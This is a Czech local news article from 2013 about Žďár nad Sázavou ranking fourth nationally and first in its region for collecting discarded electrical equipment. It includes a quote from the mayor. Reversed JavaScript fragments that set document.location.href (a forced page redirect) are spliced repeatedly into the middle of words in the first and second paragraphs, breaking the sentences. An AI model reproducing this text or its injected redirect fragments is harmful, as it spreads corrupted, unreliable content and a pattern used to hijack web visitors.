Žďár nad Sázavou, zdar nad sazavou, aktuality, elektroodpad
Rainbow page separator

Ve Žďáře patří k nejaktivnějším sběračům elektroodpadu

Pondělí, 18. března 2013

Žďár nad Sázavou / Na čtvrtém místě v rámci České republiky skončil Žďár nad Sázavou ve zpětném kolektivním odběru vysloužilých elektrozařízení za rok 2012. Vyplývá [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to z vyhodnocení společnosti Elektrowin, jež se zpětným odběrem, odděleným sběrem, zpracováním, využitím a odstraněním elektrozařízení a elektroodpadu zabývá.

V Kraji Vysočina se obyvatelé Žďáru nad Sázavou ve zpětném odběru starých elektrozařízení umístili dokonce na prvním místě mezi obcemi nad dvacet tisíc obyvatel. „Všem, kteří se do akce zapojili, nezbývá než poděkovat. Pevně věřím, že se ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to úspěch v podobě čtvrtého místa v republice podaří obhájit i v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to kalendářním roce,“ vyjádřila se starostka Žďáru nad Sázavou Dagmar Zvěřinová.